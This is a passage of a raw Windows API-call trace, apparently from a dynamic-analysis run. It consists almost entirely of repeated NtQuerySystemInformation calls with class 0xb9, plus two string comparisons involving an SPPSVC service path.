SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x20, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x20, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf30, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf30, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf30, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde20, Length=0x50, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x28, ResultLength=0x0) [0263.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x28, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0263.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb50, Length=0x20, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd50, Length=0x38, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x20, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x20, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x20, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf60, Length=0x28, ResultLength=0x0) [0263.395] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd40, Length=0x28, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd40, Length=0x28, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd40, Length=0x28, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddb0, Length=0x28, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde30, Length=0x28, ResultLength=0x0) [0263.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde30, Length=0x28, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x20, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x20, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x20, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x20, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x20, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x20, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x20, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf60, Length=0x28, ResultLength=0x0) [0263.403] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0263.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfe0, Length=0x50, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd40, Length=0x28, ResultLength=0x0) [0263.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd40, Length=0x28, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd40, Length=0x28, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddb0, Length=0x28, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde30, Length=0x28, ResultLength=0x0) [0263.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde30, Length=0x28, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x20, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x20, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x20, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd10, Length=0x20, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf10, Length=0x38, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd90, Length=0x20, ResultLength=0x0) [0263.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x20, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd20, Length=0x20, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc40, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc40, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc40, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb30, Length=0x50, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x38, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0263.417] NtQuerySystemInformation 